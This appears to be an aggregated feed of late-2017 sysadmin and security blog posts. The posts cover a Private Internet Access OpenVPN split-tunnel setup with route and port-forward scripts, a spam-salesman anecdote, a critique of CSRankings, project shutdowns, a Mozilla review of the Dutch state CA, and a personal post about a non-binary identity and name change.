Noteworthy point from the Remind Ops: when running docker containers on ext4 consider disabling journaling. Why, because a throw-away almost read-only filesystem doesn't need recovery on crash.

See also

November 12, 2017 08:25 PM

November 11, 2017

Pantz.org

OpenVPN with Private Internet Access and port forwarding

Intro

This post will show my setup using PIA (Private Internet Access) with OpenVPN on a Linux machine. Specifically, where only certain applications will utilize the VPN and the rest of the traffic will go out the normal ISP's default route. It will also show how to access the PIA API via a shell script, to open a forwarding port for inbound traffic. Lastly, I will show how to take all of the OpenVPN and PIA information and feed it to programs like aria2c or curl. The examples below were done on Ubuntu 16.04.

Packages and PIA Setup

Go signup for a PIA account.

# Install the packages you need, example uses apt-get
sudo apt-get install openvpn curl unzip

# make dir for PIA files and scripts
sudo mkdir -p /etc/openvpn/pia
cd /usr/local/etc/openvpn

# grab PIA openvpn files and unzip
url='https://www.privateinternetaccess.com/openvpn/openvpn.zip'
sudo curl -o openvpn.zip $url && sudo unzip openvpn.zip

OpenVPN password file

Now that we have PIA login info lets make password file so we don't have to put in a password every time we start OpenVPN. We just need to make a file with the PIA username on one line and the PIA password on the second line. So just use you favorite text editor and do this. The file should be called "pass" and put in the "/etc/openvpn/pia" directory. The scripts that are used later depend on this file being called "pass" and put in this specific directory. An example of what the file looks like is below.

piausername
piapassword123

Change permission on this file so only root can read it

sudo chmod 600 /etc/openvpn/pia/pass

OpenVPN config file

This is the OpenVPN config file that works with PIA, and that also utilizes the scripts that will be talked about further down in the page. Use your favorite editor and copy and paste this text to a file called "pia.conf" and put in the "/etc/openvpn/pia" directory.

# PIA OpenVPN client config file 
client
dev tun

# make sure the correct protocol is used
proto udp

# use the vpn server of your choice
# only use one server at a time
# the ip addresses can change, so use dns names not ip's
# find more server names in .ovpn files
# only certain gateways support port forwarding
#remote us-east.privateinternetaccess.com 1198
#remote us-newyorkcity.privateinternetaccess.com 1198
#remote aus.privateinternetaccess.com 1198
#remote us-west.privateinternetaccess.com 1198
remote ca-toronto.privateinternetaccess.com 1198

resolv-retry infinite
nobind
persist-key
persist-tun
cipher aes-128-cbc
auth sha1

# ca.crt and pem files from openvpn.zip downloaded from pia
ca /etc/openvpn/pia/ca.rsa.2048.crt
crl-verify /etc/openvpn/pia/crl.rsa.2048.pem

tls-client
remote-cert-tls server

# path to password file so you don't have to input pass on startup
# file format is username on one line password on second line
# make it only readable by root with: chmod 600 pass
auth-user-pass /etc/openvpn/pia/pass

# this suppresses the caching of the password and user name
auth-nocache

comp-lzo
verb 1
reneg-sec 0
disable-occ

# allows the ability to run user-defined script
script-security 2

# Don't add or remove routes automatically, pass env vars to route-up
route-noexec

# run our script to make routes
route-up "/etc/openvpn/pia/openvpn-route.sh up"

OpenVPN route script

This is the script that the OpenVPN client will run at the end of startup. The magic happens in this script. Without this script OpenVPN will start the client and make the default route for the box the vpn connection. If you want that then go into the pia.conf file and comment out the "script-security 2", "route-noexec", and "route up ..." lines, and just fire up the client "sudo openvpn --config /etc/openvpn/pia/pia.conf" and your done.

If you don't want the vpn to take over your default route then let's keep going. Now that you have left those lines in the pia.conf file, the following script will be run when the client starts, and it will set up a route that does not take over the default gateway, but just adds secondary vpn gateway for programs to use. Open your favorite text editor and copy in the script below into the file "/etc/openvpn/pia/openvpn-route.sh".

#!/bin/sh
# script used by OpenVPN to setup a route on Linux.
# used in conjunction with OpenVPN config file options
# script-security 2, route-noexec, route-up 
# script also requires route table rt2
# sudo bash -c 'echo "1 rt2" >> /etc/iproute2/rt_tables

# openvpn variables passed in via env vars
rtname="rt2"
ovpnpia="/etc/openvpn/pia"
int=$dev
iplocal=$ifconfig_local
ipremote=$ifconfig_remote
gw=$route_vpn_gateway

if [ -z $int ] || [ -z $iplocal ] || [ -z $ipremote ] || [ -z $gw ]; then
  echo "No env vars found. Use this script with an OpenVPN config file "
  exit 1
fi

help() {
  echo "For setting OpenVPN routes on Linux."
  echo "Usage: $0 up or down"
}

down() {
  # delete vpn route if found
  ip route flush table $rtname
  if [ $? -eq 0 ]; then
    echo "Successfully flushed route table $rtname"
  else
    echo "Failed to flush route table $rtname"
  fi    
}

up() {
  # using OpenVPN env vars that get set when it starts, see man page
  echo "Tunnel on interface $int. File /tmp/vpnint"
  echo $int > /tmp/vpnint
  echo "Local IP is         $iplocal. File /tmp/vpnip"
  echo $iplocal > /tmp/vpnip
  echo "Remote IP is        $ipremote"
  echo "Gateway is          $gw"

  down # remove any old routes

  ip route add default via $gw dev $int table $rtname
  if [ $? -eq 0 ]; then
    echo "Successfully added default route $gw"
  else
    echo "Failed to add default route for gateway $gw"
  fi
  ip rule add from $iplocal/32 table $rtname
  if [ $? -eq 0 ]; then
    echo "Successfully added local interface 'from' rule for $iplocal"
  else
    echo "Failed to add local interface 'from' rule for $iplocal"
  fi
  ip rule add to $gw/32 table $rtname
  if [ $? -eq 0 ]; then
    echo "Successfully added local interface 'to' rule for $gw"
  else
    echo "Failed to add local interface 'to' rule for $gw"
  fi

  # PIA port forwarding, only works with certain gateways
  # No US locations, closest US is Toronto and Montreal
  # no network traffic works during exec of this script
  # things like curl hang if not backgrounded
  $ovpnpia/pia_port_fw.sh &
}

case $1 in
  "up") up;;
  "down") down;;
  *) help;;
esac

# always flush route cache 
ip route flush cache

Now run some final commands to get the script ready to work

# make the new script executable
sudo chmod 755 /etc/openvpn/pia/openvpn-route.sh

# make a new route table rt2 in linux for the script to use
# this only has to be run once before you connect the first time
sudo bash -c 'echo "1 rt2" >> /etc/iproute2/rt_tables'

PIA port forward script

The following script is run by the openvpn-route.sh script. It will contact a PIA server and tell it to open a port for incoming traffic on your vpn connection. This is so people on the internet can contact your machine through the vpn connection. Just a important note that currently only a certain list of PIA gateways support port forwarding. See the PIA support article on this for more info. Now, open your favorite text editor and copy in the script below into the file "/etc/openvpn/pia/pia_port_fw.sh".

#!/bin/bash
# Get forward port info from PIA server

client_id=$(head -n 100 /dev/urandom | sha256sum | tr -d " -")
url="http://209.222.18.222:2000/?client_id=$client_id"

echo "Making port forward request..."

curl --interface $(cat /tmp/vpnint) $url 2>/dev/null > /tmp/vpnportfwhttp

if [ $? -eq 0 ]; then
  port_fw=$(grep -o '[0-9]\+' /tmp/vpnportfwhttp)
  [ -f /tmp/vpnportfw ] && rm /tmp/vpnportfw
  echo $port_fw > /tmp/vpnportfw
  echo "Forwarded port is $port_fw"
  echo "Forwarded port is in file /tmp/vpnportfw"
else
  echo "Curl failed to get forwarded PIA port in some way"
fi
# make the new script executable
sudo chmod 755 /etc/openvpn/pia/pia_port_fw.sh

Starting OpenVPN

Finally we can start OpenVPN to connect with PIA. To do this run the the following command. It will keep the connection in the foreground so you can watch the output.

sudo openvpn --config /etc/openvpn/pia/pia.conf

During startup the OpenVPN client and both of the scripts we made will report on the screen data about the connection and if there were any errors. The output will look like the following example.

Fri Nov 10 19:40:50 2017 OpenVPN 2.3.10 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [EPOLL] [PKCS11] [MH] [IPv6] built on Jun 22 2017
Fri Nov 10 19:40:50 2017 library versions: OpenSSL 1.0.2g  1 Mar 2016, LZO 2.08
Fri Nov 10 19:40:50 2017 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts
Fri Nov 10 19:40:50 2017 UDPv4 link local: [undef]
Fri Nov 10 19:40:50 2017 UDPv4 link remote: [AF_INET]172.98.67.111:1198
Fri Nov 10 19:40:50 2017 [dbacd7b38d135021a698ed95e8fec612] Peer Connection Initiated with [AF_INET]172.98.67.111:1198
Fri Nov 10 19:40:53 2017 TUN/TAP device tun0 opened
Fri Nov 10 19:40:53 2017 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0
Fri Nov 10 19:40:53 2017 /sbin/ip link set dev tun0 up mtu 1500
Fri Nov 10 19:40:53 2017 /sbin/ip addr add dev tun0 local 10.24.10.10 peer 10.24.10.9
Tunnel on interface tun0. File /tmp/vpnint
Local IP is         10.24.10.10. File /tmp/vpnip
Remote IP is        10.24.10.9
Gateway is          10.24.10.9
Successfully flushed route table rt2
Successfully added default route 10.24.10.9
Successfully added local interface 'from' rule for 10.24.10.10
Successfully added local interface 'to' rule for 10.24.10.9
Fri Nov 10 19:40:53 2017 Initialization Sequence Completed
Making port forward request...
Forwarded port is 40074
Forwarded port is in file /tmp/vpnportfw

Using the vpn connection

When the vpn started it dropped some files in /tmp. These files have the ip and port info we need to give to different programs when the startup. The scripts created the following files.

  • /tmp/vpnip - ip address of the vpn
  • /tmp/vpnportfw - incomming port being forwarded from the internet to the vpn
  • /tmp/vpnint - interface of the vpn

Now you can use this info when you start certain programs. Here are some examples.

# get vpn incomming port
pt=$(cat /tmp/vpnportfw)

# get vpn ip
ip=$(cat /tmp/vpnip)

# get vpn interface
int=$(cat /tmp/vpnint)

# wget a file via vpn
wget --bind-address=$ip https://ipchicken.com

# curl a file via vpn
curl --interface $int https://ipchicken.com

# ssh to server via vpn
ssh -b $ip 

# rtorrent 
/usr/bin/rtorrent -b $ip -p $pt-$pt -d /tmp

# start aria2c and background. use aria2 WebUI to connect download files
aria2c --interface=$ip --listen-port=$pt --dht-listen-port=$pt > /dev/null 2>&1 &

Final notes and warnings

If you start any programs and don't specifically bind them to the vpn interface or its ip address their connection will go out the default interface for the machine. Please remember this setup only sends specific traffic through the vpn so things like DNS requests still go through the non-vpn default gateway.

Remember only certain PIA gateways support port forwarding so if it is not working, try another PIA gateway.

PIA has a Linux vpn client that you can download and use if you are into GUI's.

by Pantz.org at November 11, 2017 03:50 AM

November 10, 2017

syslog.me

Lies, damn lies, and spammers in disguise

Everyone get so many unsolicited commercial emails these days that you just become blind at them, at best. Sometimes they are clearly, expressly commercial. Other times, they try to pass through your attention and your spam checker by disguising themselves as legitimate emails. I have a little story about that.

A couple of weeks ago I got yet another spammy mail from. It was evidently sent through a mass mailing and, as such, also included an unsubscribe link, however the guy was trying to legitimate his spam by saying that he approached me specifically because a colleague referred me to him; in addition, I felt that some keywords were added to his message only to make it sound “prettier” or even more legitimate.

I usually don’t spend time on spammers, but when I do I try to do it well. And in this occasion I had a little time to spend on it, and I did. On October 30th I was walking to my eye doctor’s while I saw an email notification on my phone. The email said the following (note: the highlights are mine):

Marco,
I was sent your way as the person who is responsible for application security testing and understand XXXXXX would be of interest to Telenor. To what lies within our next generation penetration testing abilities, XXXXXX can bring to you:
  • Periodic pen tests in uncovering serious vulnerabilities and (lack of) continuous application testing to support dynamic DevOps SDLC.
  • An ROI of 53% or higher with the ability to Identify, locate and resolve all vulnerabilities
  • Averaging 35-40% critical vulnerabilities found overall, others average 28%.
  • Over 500 international top class security researchers deployed in large teams of 40-60 ethical hackers.
We have pioneered a disruptive, ethical hacker powered application testing approach deploying large teams of senior security researchers with hacker mimicking mindsets to rapidly uncover exploits in your applications.
I would like to find some time for a conversation during November, to give you the insight into why Microsoft and Hewlett-Packard Enterprise have invested in us and why SAP is our top global reseller.
Many thanks,
Geoffrey XXXXXX
Business Development Manager

Now, we have our mailboxes on GMail and my usual method of procedure for such spammy crap from clueless salespeople is:

  • block the sender
  • unsubscribe
  • report the mail as spam

But now it’s different: first, this guy is probably trying to legitimate himself with lies for sending shit to me that I had not requested; second, despite the “personal” approach, this was clearly a mass-mailing so the whole story was clearly a lie; third, I am going to sit and wait at the doctor’s for some time. I could invest that time to run down the guy. My reply:

Kindly let me know who sent you my way, so that I can double check that. Then, maybe, we can talk.

The guy replies soon after. New mail, new lie:

Hi Marco,

Apologies for not including that in the email and I am more than happy to say how I got to you.

I have spoken to Ragnar Harper around how this may become beneficial to Telenor and he has mentioned your name during the conversations. As I have been unable to get back in contact with Ragnar I thought it best that I could gain your input into this moving forward by having some time aligned in our diaries to discuss more?

[…additional crap redacted…]

Not only I had never met or talked with any Ragnar Harper: the guy was not in our Company’s ERP. In my eyes, Mr.Geoffrey was lying right down the line. Time to get rid of him:

There is no Ragnar Harper here

Your emails will hereby be blocked and reported as Spam

Goodbye
— MM

You may think he stopped there. Well, he didn’t:

Apologies but I just phoned the switchboard and he left last month.

Above is his linkedin profile as well.
Sorry for the confusion.
Geoff
So he had this beautiful relation with Ragnar Harper, to the point that they talked together about Geoff’s products and Ragnar pointed him to me as the “person responsible for application security” (which I am not…) and he didn’t even know that Ragnar had left the company. But there is more: to get to know that, he didn’t call Ragnar: he had to call the switchboard and check LinkedIn. Geoff is clearly clutching at straws. My reply:

You just picked up a random name. You are trying to sell me something for security, which should entail a certain amount of trust in your company, and you start the interaction with a lie: not bad for someone moved by an “ethical hacking” spirit.

There can’t be any trust between me and your company. Your messages are already landing in my spam folder and that’s where they shall be. Just go and try your luck with someone else, “Geoffrey”.

The king is naked, they say. Now he gotta stop, you think. He didn’t:

Thank you for your time Marco and I am sorry that you feel that way.

If you believe that it has started on a lie then that may well be your choice as I have been in contact with Ragnar since my days at YYYYYY before joining XXXXXX and we have yet to catch up this month since he has now departed. I shall head elsewhere as requested as that is not the kind of reputation that we uphold here.

Best wishes,

Geoff

Uh, wait a minute. Did I beat the guy for no reason? Could it be that he actually knew this ex-colleague Ragnar Harper and I am assuming too much? Is it all a misunderstanding? If it is, I want to know and apologise. As said, I had never met or talked to Ragnar Harper, but I can still try to contact him through LinkedIn:

Question from an ex colleague

Hei Ragnar. My name is Marco Marongiu, I am the Head of IT in Telenor Digital. I apologize for bothering you, it’s just a short question: have you referred me to a Sales person called Geoffrey XXXXXX from a Security company called XXXXXX?

This person approached me via email. Long story short, he says he knows you personally and that you sent him my way (to use his words). Is it something that you can confirm?

We two have never met in Telenor so that sounded strange and I handled him as a spammer. But if that is actually true I do want to send the guy my apologies. Thanks in any case

Med vennlig hilsen

— Marco

I am grateful that Ragnar took some time to reply and confirm my suspect: he had never known or met the guy. I thanked Ragnar and stopped talking to “Geoffrey”. At the same time I thought it was a good story to tell, so here we go.

 

 

Advertisements
&b
&b

Tagged: spammers

by bronto at November 10, 2017 07:00 PM

November 09, 2017

Everything Sysadmin

November NYC DevOps Meetup: Building a hybrid cloud

Taras Lipatov, Principal Engineer at Sailthru, will describe his experience building a hybrid cloud using docker/mesos/consul­ at the Tuesday, November 14, 2017 nycdevops meetup. More info and to RSVP on https://www.meetup.com/nycdevops/events/241852995/. RSVP soon! See you there!

by Tom Limoncelli at November 09, 2017 03:00 PM

November 08, 2017

Everything Sysadmin

Operational Excellence in April Fools' Pranks

This issue's column in ACMQueue Magazine is titled, "Operational Excellence in April Fools' Pranks". You can read it on the Queue app: http://queue.acm.org/app/

by Tom Limoncelli at November 08, 2017 08:41 PM

Cryptography Engineering

A few thoughts on CSRankings.org

(Warning: nerdy inside-baseball academic blog post follows. If you’re looking for exciting crypto blogging, try back in a couple of days.)

If there’s one thing that academic computer scientists love (or love to hate), it’s comparing themselves to other academics. We don’t do what we do for the big money, after all. We do it — in large part — because we’re curious and want to do good science. (Also there’s sometimes free food.) But then there’s a problem: who’s going to tell is if we’re doing good science?

To a scientist, the solution seems obvious. We just need metrics. And boy, do we get them. Modern scientists can visit Google Scholar to get all sorts of information about their citation count, neatly summarized with an “H-index” or an “i10-index”. These metrics aren’t great, but they’re a good way to pass an afternoon filled with self-doubt, if that’s your sort of thing.

But what if we want to do something more? What if we want to compare institutions as well as individual authors? And even better, what if we could break those institutions down into individual subfields? You could do this painfully on Google Scholar, perhaps. Or you could put your faith in the abominable and apparently wholly made-up U.S. News rankings, as many academics (unfortunately) do.

Alternatively, you could actually collect some data about what scientists are publishing, and work with that.

This is the approach of a new site called “Computer Science Rankings”. As best I can tell, CSRankings is largely an individual project, and doesn’t have the cachet (yet) of U.S. News. At the same time, it provides researchers and administrators with something they love: another way to compare themselves, and to compare different institutions. Moreover, it does so with real data (rather than the Ouija board and blindfold that U.S. News uses). I can’t see it failing to catch on.

And that worries me, because the approach of CSRankings seems a bit arbitrary. And I’m worried about what sort of things it might cause us to do.

You see, people in our field take rankings very seriously. I know folks who have moved their families to the other side of the country over a two-point ranking difference in the U.S. News rankings — despite the fact that we all agree those are absurd. And this is before we consider the real impact on salaries, promotions, and awards of rankings (individual and institutional). People optimize their careers and publications to maximize these stats, not because they’re bad people, but because they’re (mostly) rational and that’s what rankings inspire rational people do.

To me this means we should think very carefully about what our rankings actually say.

Which brings me to the meat of my concerns with CSRankings. At a glance, the site is beautifully designed. It allows you to look at dozens of institutions, broken down by CS subfield. Within those subfields it ranks institutions by a simple metric: adjusted publication counts in top conferences by individual authors.

The calculation isn’t complicated. If you wrote a paper by yourself and had it published in one of the designated top conferences in your field, you’d get a single point. If you wrote a paper with a co-author, then you’d each get half a point. If you wrote a paper that doesn’t appear in a top conference, you get zero points. Your institution gets the sum-total of all the points its researchers receive.

If you believe that people are rational actors optimize for rankings, you might start to see the problem.

First off, what CSRankings is telling us is that we should ditch those pesky co-authors. If I could write a paper with one graduate student, but a second student also wants to participate, tough cookies. That’s the difference between getting 1/2 a point and 1/3 of a point. Sure, that additional student might improve the paper dramatically. They might also learn a thing or two. But on the other hand, they’ll hurt your rankings.

(Note: currently on CSRankings, graduate students at the same institution don’t get included in the institutional rankings. So including them on your papers will actually reduce your school’s rank.)

I hope it goes without saying that this could create bad incentives.

Second, in fields that mix systems and theory — like computer security — CSRankings is telling us that theory papers (which typically have fewer authors) should be privileged in the rankings over systems papers. This creates both a distortion in the metrics, and also an incentive (for authors who do both types of work) to stick with the one that produces higher rankings. That seems undesirable. But it could very well happen if we adopt these rankings uncritically.

Finally, there’s this focus on “top conferences”. One of our big problems in computer science is that we spend a lot of our time scrapping over a very limited number of slots in competitive conferences. This can be ok, but it’s unfortunate for researchers whose work doesn’t neatly fit into whatever areas those conference PCs find popular. And CSRankings gives zero credit for publishing anywhere but those top conferences, so you might as well forget about that.

(Of course, there’s a question about what a “top conference” even is. In Computer Security, where I work, CSRankings does not consider NDSS to be a top conference. That’s because only three conferences are permitted for each field. The fact that this number seems arbitrary really doesn’t help inspire a lot of confidence in the approach.)

So what can we do about this?

As much as I’d like to ditch rankings altogether, I realize that this probably isn’t going to happen. Nature abhors a vacuum, and if we don’t figure out a rankings system, someone else will. Hell, we’re already plagued by U.S. News, whose methodology appears to involve a popcorn machine and live tarantulas. Something, anything, has to be better than this.

And to be clear, CSRankings isn’t a bad effort. At a high level it’s really easy to use. Even the issues I mention above seem like things that could be addressed. More conferences could be added, using some kind of metric to scale point contributions. (This wouldn’t fix all the problems, but would at least mitigate the worst incentives.) Statistics could perhaps be updated to adjust for graduate students, and soften the blow of having co-authors. These things are not impossible.

And fixing this carefully seems really important. We got it wrong in trusting U.S. News. What I’d like is this time for computer scientists to actually sit down and think this one out before someone imposes a ranking system on top of us. What behaviors are we trying to incentivize for? Is it smaller author lists? Is it citation counts? Is it publishing only in a specific set of conferences?

I don’t know that anyone would agree uniformly that these should be our goals. So if they’re not, let’s figure out what they really are.


by Matthew Green at November 08, 2017 04:28 PM

November 01, 2017

Steve Kemp's Blog

Possibly retiring blogspam.net

For the past few years I've hosted a service for spam-testing blog/forum comments, and I think it is on the verge of being retired.

The blogspam.net service presented a simple API for deciding whether an incoming blog/forum comment was SPAM, in real-time. I used it myself for two real reasons:

  • For the Debian Administration website.
    • Which is now retired.
  • For my blog
    • Which still sees a lot of spam comments, but which are easy to deal with because I can execute Lua scripts in my mail-client

As a result of the Debian-Administration server cleanup I'm still in the process of tidying up virtual machines, and servers. It crossed my mind that retiring this spam-service would allow me to free up another host.

Initially the service was coded in Perl using XML/RPC. The current version of the software, version 2, is written as a node.js service, and despite the async-nature of the service it is still too heavy-weight to live on the host which runs most of my other websites.

It was suggested to me that rewriting it in golang might allow it to process more requests, with fewer resources, so I started reimplementing the service in golang at 4AM this morning:

The service does the minimum:

  • Receives incoming HTTP POSTS
  • Decodes the body to a struct
  • Loops over that struct and calls each "plugin" to process it.
    • If any plugin decides this is spam, it returns that result.
  • Otherwise if all plugins have terminated then it decides the result is "OK".

I've ported several plugins, I've got 100% test-coverage of those plugins, and the service seems to be faster than the node.js version - so there is hope.

Of course the real test will be when it is deployed for real. If it holds up for a few days I'll leave it running. Otherwise the retirement notice I placed on the website, which chances are nobody will see, will be true.

The missing feature at the moment is keeping track of the count of spam-comments rejected/accepted on a per-site basis. Losing that information might be a shame, but I think I'm willing to live with it, if the alternative is closing down..

November 01, 2017 10:00 PM

Anton Chuvakin - Security Warrior

Monthly Blog Round-Up – October 2017

Here is my next monthly "Security Warrior" blog round-up of top 5 popular posts based on last
month’s visitor data  (excluding other monthly or annual round-ups):
  1. “New SIEM Whitepaper on Use Cases In-Depth OUT!” (dated 2010) presents a whitepaper on select SIEM use cases described in depth with rules and reports [using now-defunct SIEM product]; also see this SIEM use case in depth and this for a more current list of popular SIEM use cases. Finally, see our 2016 research on developing security monitoring use cases here – and we are updating it now.
  2. Why No Open Source SIEM, EVER?” contains some of my SIEM thinking from 2009 (oh, wow, ancient history!). Is it relevant now? You be the judge.  Succeeding with SIEM requires a lot of work, whether you paid for the software, or not. BTW, this post has an amazing “staying power” that is hard to explain – I suspect it has to do with people wanting “free stuff” and googling for “open source SIEM” … 
  3. Simple Log Review Checklist Released!” is often at the top of this list – this rapildy aging checklist is still a very useful tool for many people. “On Free Log Management Tools” (also aged a bit by now) is a companion to the checklist (updated version)
  4. Again, my classic PCI DSS Log Review series is extra popular! The series of 18 posts cover a comprehensive log review approach (OK for PCI DSS 3+ even though it predates it), useful for building log review processes and procedures, whether regulatory or not. It is also described in more detail in our Log Management book and mentioned in our PCI book (now in its 4th edition!) – note that this series is mentioned in some PCI Council materials. 
  5. “SIEM Bloggables”  is a very old post, more like a mini-paper on  some key aspects of SIEM, use cases, scenarios, etc as well as 2 types of SIEM users. Still very relevant, if not truly modern.
In addition, I’d like to draw your attention to a few recent posts from my Gartner blog [which, BTW, now has more than 5X of the traffic of this blog]: 

Current research on SOAR:
Miscellaneous fun posts:

(see all my published Gartner research here)
Also see my past monthly and annual “Top Popular Blog Posts” – 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016.

Disclaimer: most content at SecurityWarrior blog was written before I joined Gartner on August 1, 2011 and is solely my personal view at the time of writing. For my current security blogging, go here.

Previous post in this endless series:

by Anton Chuvakin (anton@chuvakin.org) at November 01, 2017 05:44 PM

October 31, 2017

ma.ttias.be

Fall cleaning: shutting down some of my projects

The post Fall cleaning: shutting down some of my projects appeared first on ma.ttias.be.

Just a quick heads-up, I'm taking several of my projects offline as they prove to be too much of a hassle.

Mailing List Archive

Almost 2 years ago, I started a project to mirror/archive public mailing lists in a readable, clean layout. It's been fun, but quite a burden to maintain. In particular;

  • The mailing list archive now consists of ~3.500.000 files, which meant special precautions with filesystems (running out of inodes) & other practical concerns related to backups.
  • Abuse & take-down reports: lots of folks mailed a public mailing list, apparently not realizing it would be -- you know -- public. So they ask their name & email to be removed from those that mirror it. Like me.

    Or, in one spectacular case, a take down request by Italian police because of some drug-related incident on the Jenkins public mailing list. Fun stuff. It involved threatening lawyer mails that I quickly complied with.

All of that combined, it isn't worth it. It got around 1.000 daily pageviews, mostly from the Swift mailing list community. Sorry folks, it's gone now.

This also means the death of the @foss_security & @oss_announce Twitter accounts, since those were built on top of the mailing list archive.

Manpages Archive

I ran a manpages archive on man.ttias.be, but nobody used it (or knew about it), so I deleted it. Also hard to keep up to date, with different versions of packages & different manpages etc.

Also, it's surprisingly hard to download all manpages, extract them, turn them into HTML & throw them on a webserver. Who knew?!

Coinjump

This was a wild idea where I tried to crowdsource the meaning behind cryptocurrency price jumps. A coin can increase in value at a rate of 400% of more in just a few hours, the idea was to find the reason behind it and learn from it.

It also fueled the @CoinJumpApp account on Twitter, but that's dead now too.

The source is up on Github, but I'm no longer maintaining it.

More time for other stuff!

Either way, some projects just cause me more concern & effort than I care to put into them, so time to clean that up & get some more mental braincycles for different projects!

The post Fall cleaning: shutting down some of my projects appeared first on ma.ttias.be.

by Mattias Geniar at October 31, 2017 08:25 PM

October 30, 2017

ma.ttias.be

Staat der Nederlanden CA might be revoked from Mozilla Policy?

The post Staat der Nederlanden CA might be revoked from Mozilla Policy? appeared first on ma.ttias.be.

The official Dutch CA "Staat der Nederlanden" is currently under review by the Mozilla foundation after the intelligence and security services law has been passed, which gives the government (legal) access to serve as a man-in-the-middle for legit TLS connections.

This could have far reaching consequences. They currently have 20+ root & intermediate certificates accepted.

Note there's still a question mark in the subject, this decision isn't certain or final yet.

Became vulnerable to MitM attacks.

The new "Wet op de inlichtingen- en veiligheidsdiensten (Wiv)" (Law for intelligence and security services) has been accepted by the Dutch Government. Provisions authorizing new powers for the dutch intelligence and security services will become active starting January 1st, 2018.

This revision of the law will authorize intelligence and security to intercept and analyze cable-bound (Internet) traffic, and will include far-reaching authorizations, including covert technical attacks, to facilitate their access to encrypted traffic.

Source: Logius: Staat der Nederlanden CA trust issue (WiV)

The post Staat der Nederlanden CA might be revoked from Mozilla Policy? appeared first on ma.ttias.be.

by Mattias Geniar at October 30, 2017 11:52 AM

October 29, 2017

Raymii.org

ncdu - for troubleshooting diskspace and inode issues

In my box of sysadmin tools there are multiple gems I use for troubleshooting servers. Since I work at a cloud provider sometimes I have to fix servers that are not mine. One of those tools is `ncdu`. It's a very usefull tool when a server has a full disk, both full of used space or full of used inodes. This article covers ncdu and shows the process of finding the culprit when you're out of disk space or inodes.

October 29, 2017 12:00 AM

October 27, 2017

OpenSSL

Steve Marquess

Steve Marquess is leaving the OpenSSL project as of the 15th of November 2017.

The OpenSSL Management Committee (OMC) would like to wish him all the best for the future.

All communication that used to go to Steve Marquess directly, should now be sent to info@openssl.org in the first instance.

Thanks for your contributions to the project over the years!

October 27, 2017 01:00 AM

October 25, 2017

The Lone Sysadmin

Consistency Is the Hobgoblin of Little Minds

Ever heard someone tell you “consistency is the hobgoblin of little minds?” They’re misquoting Ralph Waldo Emerson by leaving out an important word: foolish. That’s like leaving out the word “not” in a statement. The whole meaning changes because of the omission. We can all agree that “I am on fire” and “I am not […]

The post Consistency Is the Hobgoblin of Little Minds appeared first on The Lone Sysadmin. Head over to the source to read the full post!

by Bob Plankers at October 25, 2017 05:43 PM

Evaggelos Balaskas

Autonomous by Annalee Newitz

autonomous.jpg

Autonomous by Annalee Newitz

The year is 2144. A group of anti-patent scientists are working to reverse engineer drugs in free labs, for (poor) people to have access to them. Agents of International Property Coalition are trying to find the lead pirate-scientist and stop any patent violation by any means necessary. In this era, without a franchise (citizenship) autonomous robots and people are slaves. But only a few of the bots have are autonomous. Even then, can they be free ? Can androids choose their own gender identity ? Transhumanism and extension life drugs are helping people to live a longer and better life.

A science fiction novel without Digital Rights Management (DRM).

Tag(s): Autonomous, books

October 25, 2017 11:09 AM

October 24, 2017

The Geekess

Binaries are for computers

[Note: comments on this post will be moderated by someone other than me.]

Sage in a purple tie and black shirt CC-BY-NC-ND Sage SharpCC-BY-NC-ND Sage Sharp

Recently, I’ve come to terms with the fact that I’m non-binary. Non-binary can be a bit of an umbrella term, but for me, being non-binary means I don’t identify as either a man or a woman. For me, gender is more like a 3D space, a universe of different traits. Most people gravitate towards a set of traits that we label as masculine or feminine. I don’t feel a strong pull towards being either really masculine or really feminine.

I’m writing this post for two reasons. The first reason is that representation matters. I know some non-binary people in tech and from the indie comics industry, but I’d love to see those voices and stories promoted. Hopefully being open and honest with people about my identity will help, both to raise awareness, and to give other people the courage to start an exploration into their own gender identity. I know talking with queer friends and reading comics helped me while I was working out my own gender identity.

The second reason I’m writing this is because there’s a couple ways allies can help me as I go through my transition:

  • Use my new name (Sage) and my correct pronouns (they/them)
  • Educate yourself on what it means to be non-binary
  • Think about how you use gender in your software and websites
  • Think about making your events more inclusive towards non-binary folks

Names

I’ve changed my name to Sage Sharp.

I would appreciate it if you could use my new name. If you’re thinking about writing about me, there’s a section on writing about individuals who are transitioning in “The Responsible Communication Style Guide”. You should buy a digital copy!

Pronouns and Titles

I use the pronoun ‘they’. If you’ve never had someone ask for you to use a specific pronoun, this Robot Hugs comic does a good job of explaining how to handle it.

If you have to add a formal title before my last name, please use ‘Mx Sharp’. ‘Mx’ is a gender-neutral honorific, like ‘Mr’, ‘Ms’, or ‘Mrs’. Mx is pronounced in a couple different ways: /ˈməks/, /ˈmɪks/ or /ˈmʌks/ (miks or muks). I like pronouncing it ‘mux’ like the electronics part multiplexer, but pick whichever pronunciation works for you. If you want to get really formal and are reaching for a term like ‘lady/gentlemen’, I prefer the term ‘gentleperson’.

I’ve found positive gender-neutral terms to describe myself with, like “dapper” or “cute”. I cringe every time a stranger attempts to gender me, since they usually settle on feminine forms of address. I wish more people would use gender-neutral terms like “folks”, “friend”, “comrade”, or say “Hello everyone!” or “Hi y’all” and leave it at that.

Being able to write in a gender neutral way is hard and takes a lot of practice. It means shifting from gendered terms like “sister/brother” or “daughter/son” to gender-neutral terms like “sibling” or “kid”. It means getting comfortable with the singular they instead of ‘she’ or ‘he’. Sometimes there isn’t a gender neutral term for a relationship like “aunt/uncle” and it means you have to make up some new term, like “Titi”. There’s some lists of gender-neutral titles but in general, just ask what term to use.

If this is all new and bewildering to you, I recommend the book ‘The ABCs of LGBTQ+‘. Another good book is ‘You’re in the wrong bathroom‘ which breaks down some common myths about non-binary and trans folks.

Gender Forms

I’m really not looking forward to my gender being listed as ‘other’ or ‘prefer not to say’ on every gender form out there. I don’t even know if I can change my gender in social media, email, credit cards, banking… It’s a giant headache to change my name, let alone hope that technology systems will allow me to change my gender. It’s probably a separate post all itself, or a topic for my Diversity Deep Dives mailing list.

If you’re a programmer, website designer, or user experience person, ask yourself: Do you even need to collect information about a person’s gender? Could your website use gender neutral language? If you do need to address someone in a gendered way, maybe you just need to ask for their preferred pronouns instead of their gender? Could you drop the use of gendered honorifics, like ‘Miss’, ‘Mrs’ and ‘Mr’, or ‘Sir’ and ‘Madam’?

Inclusive Tech Groups

